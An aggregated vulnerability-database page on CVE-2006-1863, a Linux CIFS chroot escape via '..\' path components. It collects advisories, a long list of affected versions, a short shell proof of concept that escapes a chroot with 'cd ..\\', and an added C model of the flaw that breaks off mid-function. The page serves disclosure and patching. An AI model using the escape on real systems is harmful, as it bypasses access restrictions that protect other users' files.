CVE-2006-1863
CVSS 2.1
Published: 2006-04-25 18:02:00
Revised: 2013-08-03 01:41:19

[Original] Directory traversal vulnerability in CIFS in Linux 2.6.16 and earlier allows local users to escape chroot restrictions for an SMB-mounted filesystem via "..\\" sequences, a similar vulnerability to CVE-2006-1864.


[CNNVD] Linux Kernel CIFS chroot Directory Traversal Vulnerability (CNNVD-200604-444)

        The Linux kernel is the kernel of the open-source Linux operating system.
        The CIFS filesystem client in Linux kernel 2.6.16 and earlier (fixed in 2.6.16.11) does not validate the path components it forwards to the SMB server. The VFS splits a path on '/' and resolves ".." itself, clamping it at the process root, but a component such as "..\" is not ".." to the VFS: it is passed to CIFS as the name of a child entry, and CIFS forwards it to the server unchanged. The server splits on '\' and therefore interprets it as "go to the parent directory". A local user confined by chroot on an SMB-mounted filesystem can thus use "..\" sequences to reach directories outside the chroot and read restricted resources.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no special access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:10383  Directory traversal vulnerability in CIFS in Linux 2.6.16 and earlier allows local users to escape chroot restrictions for an SMB-mounted fi...
*The OVAL definition describes in detail how to detect this vulnerability; see the referenced OVAL definition for further technical details.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1863
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1863
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-444
(official data source) CNNVD

- Other links and resources

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189434
(PATCH)  CONFIRM  Red Hat Bugzilla 189434
http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=296034f7de8bdf111984ce1630ac598a9c94a253
(PATCH)  CONFIRM  kernel.org commit 296034f7de8bdf111984ce1630ac598a9c94a253
http://www.vupen.com/english/advisories/2006/2554
(UNKNOWN)  VUPEN  ADV-2006-2554
http://www.vupen.com/english/advisories/2006/1542
(UNKNOWN)  VUPEN  ADV-2006-1542
http://www.osvdb.org/25068
(UNKNOWN)  OSVDB  25068
http://rhn.redhat.com/errata/RHBA-2007-0304.html
(UNKNOWN)  REDHAT  RHBA-2007-0304
http://xforce.iss.net/xforce/xfdb/26141
(UNKNOWN)  XF  kernel-cifs-directory-traversal(26141)
http://www.trustix.org/errata/2006/0024
(UNKNOWN)  TRUSTIX  2006-0024
http://www.securityfocus.com/bid/17742
(UNKNOWN)  BID  17742
http://www.novell.com/linux/security/advisories/2006-05-31.html
(UNKNOWN)  SUSE  SUSE-SA:2006:028
http://www.mandriva.com/security/advisories?name=MDKSA-2006:151
(UNKNOWN)  MANDRIVA  MDKSA-2006:151
http://www.mandriva.com/security/advisories?name=MDKSA-2006:150
(UNKNOWN)  MANDRIVA  MDKSA-2006:150
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.11
(UNKNOWN)  CONFIRM  ChangeLog-2.6.16.11
http://www.debian.org/security/2006/dsa-1103
(UNKNOWN)  DEBIAN  DSA-1103
http://secunia.com/advisories/21614
(UNKNOWN)  SECUNIA  21614
http://secunia.com/advisories/20914
(UNKNOWN)  SECUNIA  20914
http://secunia.com/advisories/20398
(UNKNOWN)  SECUNIA  20398
http://secunia.com/advisories/19868
(UNKNOWN)  SECUNIA  19868

- Vulnerability information

Linux Kernel CIFS chroot Directory Traversal Vulnerability
Low severity  Path traversal
2006-04-25 00:00:00 2006-04-30 00:00:00
Local
        The Linux kernel is the kernel of the open-source Linux operating system.
        The CIFS filesystem client in the Linux kernel has an input validation error: it forwards path components containing "..\" to the SMB server unchecked. A local attacker confined by chroot on an SMB-mounted filesystem can use such "..\" directory traversal sequences to bypass the chroot restriction and access restricted resources.

- Advisories and patches

        The vendor has released an updated kernel that fixes this security issue; download link:
        Linux linux-2.6.16.11.tar.bz2
        http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.16.11.tar.bz2

- Vulnerability information (F49475)

Mandriva Linux Security Advisory 2006.151 (PacketStormID:F49475)
2006-08-28 00:00:00
Mandriva  mandriva.com
advisory,kernel,vulnerability
linux,mandriva
CVE-2006-1066,CVE-2006-1863,CVE-2006-1864,CVE-2006-2934,CVE-2006-2935,CVE-2006-2936,CVE-2006-3468,CVE-2006-3745

Mandriva Linux Security Advisory MDKSA-2006-151 - A number of vulnerabilities were discovered and corrected in the Linux 2.6 kernel.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:151
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : kernel
 Date    : August 25, 2006
 Affected: 2006.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 Prior to and including 2.6.16-rc2, when running on x86_64 systems with
 preemption enabled, local users can cause a DoS (oops) via multiple
 ptrace tasks that perform single steps (CVE-2006-1066).
 
 Prior to 2.6.16, a directory traversal vulnerability in CIFS could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1863).
 
 Prior to 2.6.16, a directory traversal vulnerability in smbfs could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1864).
 
 Prior to 2.6.16.23, SCTP conntrack in netfilter allows remote
 attackers to cause a DoS (crash) via a packet without any chunks,
 causing a variable to contain an invalid value that is later used to
 dereference a pointer (CVE-2006-2934).
 
 The dvd_read_bca function in the DVD handling code assigns the wrong
 value to a length variable, which could allow local users to execute
 arbitrary code via a crafted USB storage device that triggers a buffer
 overflow (CVE-2006-2935).
 
 Prior to 2.6.17, the ftdi_sio driver could allow local users to cause
 a DoS (memory consumption) by writing more data to the serial port than
 the hardware can handle, causing the data to be queued (CVE-2006-2936).
 
 The 2.6 kernel, when using both NFS and EXT3, allowed remote attackers
 to cause a DoS (file system panic) via a crafted UDP packet with a V2
 lookup procedure that specifies a bad file handle (inode number),
 triggering an error and causing an exported directory to be remounted
 read-only (CVE-2006-3468).
 
 The 2.6 kernel's SCTP was found to cause system crashes and allow for
 the possibility of local privilege escalation due to a bug in the
 get_user_iov_size() function that doesn't properly handle overflow when
 calculating the length of iovec (CVE-2006-3745).
 
 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.
 
 In addition to these security fixes, other fixes have been included
 such as:
 
 - added support for new devices:
   o Testo products in usb-serial
   o ATI SB600 IDE
   o ULI M-1573 south Bridge
   o PATA and SATA support for nVidia MCP55, MCP61, MCP65, and AMD CS5536
   o Asus W6A motherboard in snd-hda-intel
   o bcm 5780
 - fixed ip_gre module unload OOPS
 - enabled opti621 driver for x86 and x86_64
 - fixed a local DoS introduced by an incomplete fix for CVE-2006-2445
 - updated to Xen 3.0.1 with selected fixes
 - enable hugetlbfs
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1066
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1863
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1864
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2934
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2935
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2936
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3468
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3745
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 9b4811892823bfa6ddfa648f029ee500  2006.0/RPMS/kernel-2.6.12.25mdk-1-1mdk.i586.rpm
 27e6afeac2d98e07cd8a16d2ffa8de28  2006.0/RPMS/kernel-BOOT-2.6.12.25mdk-1-1mdk.i586.rpm
 dcd2a1843a5f56c286a0e6270c7b1d79  2006.0/RPMS/kernel-i586-up-1GB-2.6.12.25mdk-1-1mdk.i586.rpm
 477b78d6836d03484a58720f2137e506  2006.0/RPMS/kernel-i686-up-4GB-2.6.12.25mdk-1-1mdk.i586.rpm
 ab1f7540dbfd41f469f4931a710dbe95  2006.0/RPMS/kernel-smp-2.6.12.25mdk-1-1mdk.i586.rpm
 ed246f8b552bb26bb8e89c0c0842bbe9  2006.0/RPMS/kernel-source-2.6.12.25mdk-1-1mdk.i586.rpm
 acb15b08ed7f7d2ad3747c555a07b401  2006.0/RPMS/kernel-source-stripped-2.6.12.25mdk-1-1mdk.i586.rpm
 ede19a2f7dd7b715c58e9c61ee1c3359  2006.0/RPMS/kernel-xbox-2.6.12.25mdk-1-1mdk.i586.rpm
 848a9f9725f141077a34affb42088946  2006.0/RPMS/kernel-xen0-2.6.12.25mdk-1-1mdk.i586.rpm
 d280fd356d01831e6dbe5f0fc73c741b  2006.0/RPMS/kernel-xenU-2.6.12.25mdk-1-1mdk.i586.rpm
 c0a388efafe83a187a58d582ddf9cafb  2006.0/SRPMS/kernel-2.6.12.25mdk-1-1mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 54c6b69a3ce44d4dfb217f4b4f620293  x86_64/2006.0/RPMS/kernel-2.6.12.25mdk-1-1mdk.x86_64.rpm
 0eded734bf839d253c18d4849507a687  x86_64/2006.0/RPMS/kernel-BOOT-2.6.12.25mdk-1-1mdk.x86_64.rpm
 c379d55bcaee5070b46475b2e1cbce0a  x86_64/2006.0/RPMS/kernel-smp-2.6.12.25mdk-1-1mdk.x86_64.rpm
 2fad12f6ea68fdd1d000c2602f47a0a3  x86_64/2006.0/RPMS/kernel-source-2.6.12.25mdk-1-1mdk.x86_64.rpm
 1ae8c5f75d5660e511cfe2db62a02056  x86_64/2006.0/RPMS/kernel-source-stripped-2.6.12.25mdk-1-1mdk.x86_64.rpm
 160c2425b4be695feaafffdb59cc8fcd  x86_64/2006.0/RPMS/kernel-xen0-2.6.12.25mdk-1-1mdk.x86_64.rpm
 677a458c0eb70f9f8a5bd9553b96f589  x86_64/2006.0/RPMS/kernel-xenU-2.6.12.25mdk-1-1mdk.x86_64.rpm
 c0a388efafe83a187a58d582ddf9cafb  x86_64/2006.0/SRPMS/kernel-2.6.12.25mdk-1-1mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFE7xpfmqjQ0CJFipgRAio9AKDjb4g8obg5dkOccjQOlFQ6oeIKAQCgkNQ3
ZdXAs/f1g9RsGP1wVlrqg+U=
=TeRg
-----END PGP SIGNATURE-----

    

- Vulnerability information (F49474)

Mandriva Linux Security Advisory 2006.150 (PacketStormID:F49474)
2006-08-28 00:00:00
Mandriva  mandriva.com
advisory,kernel,vulnerability
linux,mandriva
CVE-2006-0554,CVE-2006-0744,CVE-2006-1343,CVE-2006-1857,CVE-2006-1858,CVE-2006-1863,CVE-2006-1864,CVE-2006-2274,CVE-2006-2935,CVE-2006-2936,CVE-2006-3468,CVE-2006-3745

Mandriva Linux Security Advisory MDKSA-2006-150 - A number of vulnerabilities were discovered and corrected in the Linux 2.6 kernel.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:150
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : kernel
 Date    : August 25, 2006
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 Prior to 2.6.15.5, the kernel allowed local users to obtain sensitive
 information via a crafted XFS ftruncate call (CVE-2006-0554).
 
 Prior to 2.6.15.5, the kernel did not properly handle uncanonical
 return addresses on Intel EM64T CPUs causing the kernel exception
 handler to run on the user stack with the wrong GS (CVE-2006-0744).
 
 ip_conntrack_core.c in the 2.6 kernel, and possibly
 nf_conntrack_l3proto_ipv4.c did not clear sockaddr_in.sin_zero before
 returning IPv4 socket names from the getsockopt function with
 SO_ORIGINAL_DST, which could allow local users to obtain portions of
 potentially sensitive memory (CVE-2006-1343).
 
 Prior to 2.6.16.17, a buffer overflow in SCTP in the kernel allowed
 remote attackers to cause a Denial of Service (crash) and possibly
 execute arbitrary code via a malformed HB-ACK chunk (CVE-2006-1857).
 
 Prior to 2.6.16.17, SCTP in the kernel allowed remote attackers to
 cause a DoS (crash) and possibly execute arbitrary code via a chunk
 length that is inconsistent with the actual length of provided
 parameters (CVE-2006-1858).
 
 Prior to 2.6.16, a directory traversal vulnerability in CIFS could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1863).
 
 Prior to 2.6.16, a directory traversal vulnerability in smbfs could
 allow a local user to escape chroot restrictions for an SMB-mounted
 filesystem via "..\\" sequences (CVE-2006-1864).
 
 Prior to 2.6.17, Linux SCTP allowed a remote attacker to cause a DoS
 (infinite recursion and crash) via a packet that contains two or more
 DATA fragments, which caused an skb pointer to refer back to itself
 when the full message is reassembled, leading to an infinite recursion
 in the sctp_skb_pull function (CVE-2006-2274).
 
 The dvd_read_bca function in the DVD handling code assigns the wrong
 value to a length variable, which could allow local users to execute
 arbitrary code via a crafted USB storage device that triggers a buffer
 overflow (CVE-2006-2935).
 
 Prior to 2.6.17, the ftdi_sio driver could allow local users to cause
 a DoS (memory consumption) by writing more data to the serial port than
 the hardware can handle, causing the data to be queued (CVE-2006-2936).
 
 The 2.6 kernel, when using both NFS and EXT3, allowed remote attackers
 to cause a DoS (file system panic) via a crafted UDP packet with a V2
 lookup procedure that specifies a bad file handle (inode number),
 triggering an error and causing an exported directory to be remounted
 read-only (CVE-2006-3468).
 
 The 2.6 kernel's SCTP was found to cause system crashes and allow for
 the possibility of local privilege escalation due to a bug in the
 get_user_iov_size() function that doesn't properly handle overflow when
 calculating the length of iovec (CVE-2006-3745).
 
 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0554
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0744
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1343
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1857
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1858
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1863
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1864
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2274
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2935
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2936
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3468
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3745
 _______________________________________________________________________
 
 Updated Packages:
 
 Corporate 3.0:
 9d14c43145beafb4e63fe8cae758d0f6  corporate/3.0/RPMS/kernel-2.6.3.35mdk-1-1mdk.i586.rpm
 e7331f51ed5cf4edee33efcb01f49243  corporate/3.0/RPMS/kernel-BOOT-2.6.3.35mdk-1-1mdk.i586.rpm
 dcb027450192d7d73f407f30d3e3e852  corporate/3.0/RPMS/kernel-enterprise-2.6.3.35mdk-1-1mdk.i586.rpm
 59f29ace5cc862c84cace5d046d6302e  corporate/3.0/RPMS/kernel-i686-up-4GB-2.6.3.35mdk-1-1mdk.i586.rpm
 6b062c5059587a927f31fea04fb91a3a  corporate/3.0/RPMS/kernel-p3-smp-64GB-2.6.3.35mdk-1-1mdk.i586.rpm
 744287198a20913bd38b1c1d37a68bd2  corporate/3.0/RPMS/kernel-secure-2.6.3.35mdk-1-1mdk.i586.rpm
 17780ad90f4989615baab5f115074f8a  corporate/3.0/RPMS/kernel-smp-2.6.3.35mdk-1-1mdk.i586.rpm
 4555bac09b7ce50d83b97c47af0b2724  corporate/3.0/RPMS/kernel-source-2.6.3-35mdk.i586.rpm
 7165754462cdfcd92c894f56623bc8b0  corporate/3.0/RPMS/kernel-source-stripped-2.6.3-35mdk.i586.rpm
 e59db387f0642f5293dc60283832557b  corporate/3.0/SRPMS/kernel-2.6.3.35mdk-1-1mdk.src.rpm

 Corporate 3.0/X86_64:
 918a70fe836d900b217f442b5208c779  x86_64/corporate/3.0/RPMS/kernel-2.6.3.35mdk-1-1mdk.x86_64.rpm
 dd1ea77b15bd07c75f5ab7caf00dbde0  x86_64/corporate/3.0/RPMS/kernel-BOOT-2.6.3.35mdk-1-1mdk.x86_64.rpm
 c8964849f4142c2c51c3ddd298513753  x86_64/corporate/3.0/RPMS/kernel-secure-2.6.3.35mdk-1-1mdk.x86_64.rpm
 7a98664c4ba5f0d50a500c1158a8fb08  x86_64/corporate/3.0/RPMS/kernel-smp-2.6.3.35mdk-1-1mdk.x86_64.rpm
 3c4d5ca4f7a1a91d99fc182e499c9e76  x86_64/corporate/3.0/RPMS/kernel-source-2.6.3-35mdk.x86_64.rpm
 a25c6705ba2b70c85c1c86e68cb0d3cd  x86_64/corporate/3.0/RPMS/kernel-source-stripped-2.6.3-35mdk.x86_64.rpm
 e59db387f0642f5293dc60283832557b  x86_64/corporate/3.0/SRPMS/kernel-2.6.3.35mdk-1-1mdk.src.rpm

 Multi Network Firewall 2.0:
 5cab4be7c19a67689f33f01de208879e  mnf/2.0/RPMS/kernel-2.6.3.35mdk-1-1mdk.i586.rpm
 ee1db88c9010b3a1af0f5ea93ce86505  mnf/2.0/RPMS/kernel-i686-up-4GB-2.6.3.35mdk-1-1mdk.i586.rpm
 0e3618eec1dcb5bca817ecec7e912836  mnf/2.0/RPMS/kernel-p3-smp-64GB-2.6.3.35mdk-1-1mdk.i586.rpm
 ded09245567203340c86b3ddacf21b3a  mnf/2.0/RPMS/kernel-secure-2.6.3.35mdk-1-1mdk.i586.rpm
 7efdc84f2748f1c2237a72ef94d90b31  mnf/2.0/RPMS/kernel-smp-2.6.3.35mdk-1-1mdk.i586.rpm
 d12744fdab6bf6606ed13fae69b51f50  mnf/2.0/SRPMS/kernel-2.6.3.35mdk-1-1mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFE7xa9mqjQ0CJFipgRAsAAAKC/kOcYUfcUldfx8MGy87CHigyjSgCeJ/43
JsyWup/H/+NRqjHU1SGHaGc=
=8KyZ
-----END PGP SIGNATURE-----

    

- Vulnerability information (OSVDB 25068)

25068
Linux Kernel CIFS SMB Mount Traversal chroot Restriction Bypass
Location: Local Access Required; Attack type: Input Manipulation
Impact: Loss of Confidentiality, Loss of Integrity
Exploit: Public; Vendor Verified

- Vulnerability description

The Linux Kernel contains a flaw that may allow a malicious user to escape a chroot environment. The issue is triggered when a user, inside a chroot on a CIFS file system, changes to a working directory whose name ends in a backslash, e.g. 'cd ..\\' (the shell passes the argument ..\ to the kernel). Because the VFS does not treat "..\" as "..", the component is handed to the CIFS client as a plain name and forwarded to the SMB server, which interprets the backslash as a path separator and resolves it to the parent directory outside the chroot. The flaw may allow unauthorised access to file system resources, resulting in a loss of confidentiality and/or integrity.

- Timeline

2006-04-19 Unknown
2006-04-19 Unknown

- Solution

Upgrade to version 2.6.16.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information (SecurityFocus BID 17742)

Linux Kernel CIFS CHRoot Security Restriction Bypass Vulnerability
Class: Input Validation Error  BID: 17742
Remote: No  Local: Yes
Published: 2006-04-28 12:00:00  Updated: 2007-01-18 02:42:00
Marcel Holtmann is credited with the discovery of this vulnerability.

- Affected program versions

Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
S.u.S.E. Linux Enterprise Server 9
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .8
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .5
Linux kernel 2.6.16 .4
Linux kernel 2.6.16 .3
Linux kernel 2.6.16 .2
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.15 .6
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc6
Linux kernel 2.6.15 -rc5
Linux kernel 2.6.15 -rc4
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
+ Red Hat Fedora Core4
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
+ Red Hat Fedora Core3
+ Red Hat Fedora Core2
+ Trustix Secure Linux 3.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.6.15.5
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1

- Unaffected program versions

Linux kernel 2.6.16 .11

- Discussion

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied path components before passing them to the SMB server.

The problem affects chroot inside of an SMB-mounted filesystem ('cifs'). A local attacker who is confined by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem outside it.

- Exploit

This issue can be exploited with ordinary system commands.

The following proof of concept is available (the directory being chrooted into lies on a CIFS mount):
[root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\\
bash-2.05a# pwd
/..\
bash-2.05a# ls
<list of files from parent>
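The mechanism behind the proof of concept, modelled in user-space C as an added illustration (this is not kernel code and not part of the advisory or the SecurityFocus record): the VFS resolves ".." itself and clamps it at the chroot root, but a component named "..\" is a plain name to the VFS, so the vulnerable client joins it onto the share-relative path with '\' and the server, splitting on '\', walks up a level. `cifs_component_ok` mirrors the shape of the check in `cifs_lookup()` in later mainline kernels as I recall it (a backslash in a single VFS component is rejected with -EINVAL unless the mount uses POSIX path syntax); the join-with-backslash client model, the server canonicalisation model, the "jail" prefix and all helper names are assumptions made for this illustration.

```c
/* Added illustration of CVE-2006-1863: user-space model, not kernel code. */
#include <stdio.h>
#include <string.h>

#define MAXSEG  32
#define MAXPATH 256

/* Mirrors the fix's check (assumed shape of the cifs_lookup() check):
 * a single VFS path component may not contain the SMB separator. */
int cifs_component_ok(const char *comp)
{
    return strchr(comp, '\\') == NULL;
}

/* Pre-fix client behaviour (modelled): append the component to the
 * share-relative prefix without inspecting it. prefix "" is the share root. */
static void build_smb_path(char *out, size_t outsz,
                           const char *prefix, const char *comp)
{
    snprintf(out, outsz, "\\%s\\%s", prefix, comp);
}

/* Model of the server side: split the wire path on '\', drop empty and
 * "." segments, and let ".." pop the previous segment (clamped at root). */
void server_canonicalise(const char *wire, char *out, size_t outsz)
{
    char buf[MAXPATH];
    const char *seg[MAXSEG];
    int n = 0;

    snprintf(buf, sizeof buf, "%s", wire);
    for (char *tok = strtok(buf, "\\"); tok; tok = strtok(NULL, "\\")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (strcmp(tok, "..") == 0) {
            if (n > 0)
                n--;
            continue;
        }
        if (n < MAXSEG)
            seg[n++] = tok;
    }
    if (n == 0) {
        snprintf(out, outsz, "\\");
        return;
    }
    out[0] = '\0';
    for (int i = 0; i < n; i++) {
        size_t len = strlen(out);
        snprintf(out + len, outsz - len, "\\%s", seg[i]);
    }
}

/* One lookup of `comp` inside a chroot rooted at share directory
 * `chroot_prefix`. Returns 0 and the server-side path in `out`, or -1
 * when the fixed client rejects the component (-EINVAL in the kernel). */
int lookup_in_chroot(int fixed, const char *chroot_prefix,
                     const char *comp, char *out, size_t outsz)
{
    char wire[MAXPATH];

    /* A real ".." never reaches the filesystem: the VFS resolves it and
     * clamps it at the process root, so the chroot directory is returned. */
    if (strcmp(comp, "..") == 0) {
        snprintf(out, outsz, "\\%s", chroot_prefix);
        return 0;
    }
    if (fixed && !cifs_component_ok(comp))
        return -1;

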